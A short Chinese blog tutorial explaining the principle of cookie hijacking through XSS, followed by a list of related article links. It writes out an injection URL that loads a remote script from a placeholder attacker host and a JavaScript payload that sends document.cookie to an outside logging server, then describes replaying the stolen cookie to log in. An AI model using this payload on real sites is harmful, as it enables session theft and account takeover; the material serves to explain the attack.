说说劫持 Cookie 的原理
2019-04-06 15:32
204 查看
版权声明:如果喜欢,就点个赞呗 O(∩_∩)O~ https://blog.csdn.net/deniro_li/article/details/89056386
完成具体功能的恶意脚本(javaScript、Flash 等)称为 XSS Payload。黑客会通过这些脚本,来控制用户的浏览器。劫持 Cookie 就是一种 XSS Payload。
Cookie 中,一般加密存放着当前用户的登陆凭证。如果 Cookie 被劫持,那么黑客就可以不使用密码,直接登陆到用户的账号中。
1 窃取 Cookie
首先先在存在 XSS 漏洞的网站,加载一段远程脚本,形如:
http://www.xxx.com/xxx.html?param="><script src=http://www.malice.com/malice.js></script>
XSS Payload 写在 malice.js 中,这样就可以避免直接在 URL 参数中写入大量的脚本代码。
malice.js 内容:
var img = document.createElement("img"); img.src = "http://xxx.com/log?" + escape(document.cookie); document.body.appendChild(img);
escape() 函数可对字符串进行编码,这样就可以在所有的计算机上读取该字符串。
在此,我们动态创建了一个图片标签,并把 cookie 参数作为对象,发送给后端服务器。
这样就完成了窃取 Cookie 的整个过程。
2 利用 Cookie 登陆账户
一个网站,如果还未登录,一般在右上角有个 “登录” 链接:
假设已经得到了某个账户的 Cookie 信息,那么就可以在 Fiddler 中,模拟 Get 请求:
然后就可以成功登陆网站咯:
相关文章推荐
- 【javaweb】Session原理以及浏览器禁止Cookie之后服务器如何获取Session
- 说说 Spring AOP 原理
- 说说Cookie和Session
- PHP Cookie原理
- [置顶] Cookie 原理
- 简单粗暴-说说STL中vector的实现原理
- session和cookie原理(容易理解)
- 映像劫持原理
- PHP的COOKIE原理介绍与使用
- ASP.NET Cookie概念、CURD操作、原理、实际运用
- TCP劫持原理分析与实践
- 深入理解Servlet/JSP之“Cookie和Session原理”
- Session管理及Cookie应用原理
- 单点登录三个方法及原理:共享Session、基于OpenId的单点登录、基于Cookie的OpenId存储方案
- Cookie解释以及原理分析
- jsession 和 cookie欺骗原理
- DLL劫持漏洞原理
- 深入理解Session和cookie原理
- cookie和session的原理以及机制
- cookie、session原理